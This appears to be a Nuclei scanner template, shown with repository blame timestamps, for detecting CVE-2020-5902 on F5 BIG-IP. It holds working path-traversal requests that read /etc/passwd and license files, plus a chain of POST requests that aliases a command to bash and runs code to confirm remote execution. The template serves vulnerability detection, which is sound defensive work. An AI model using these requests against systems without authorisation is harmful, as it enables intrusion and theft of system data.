nuclei-templates/cves/2020/CVE-2020-5902.yaml

66 lines
2.2 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
2020-08-23 00:37:43 +00:00
author: madrobot & dwisiswant0 & ringo
severity: high
tags: cve,cve2020,bigip,rce
requests:
- method: GET
path:
2020-07-05 16:15:24 +00:00
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
2020-08-23 00:37:43 +00:00
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
status:
- 200
2020-07-05 16:15:24 +00:00
- type: regex
regex:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
2020-08-23 00:37:43 +00:00
- "HSQL Database Engine Servlet"
condition: or
2020-07-05 16:21:24 +00:00
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=create%20cli%20alias%20private%20list%20command%20bash
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=list%20%2Ftmp%2Fnonexistent
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=delete%20cli%20alias%20private%20list
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2020-08-23 00:37:43 +00:00
- "h3ll0_w0Rld"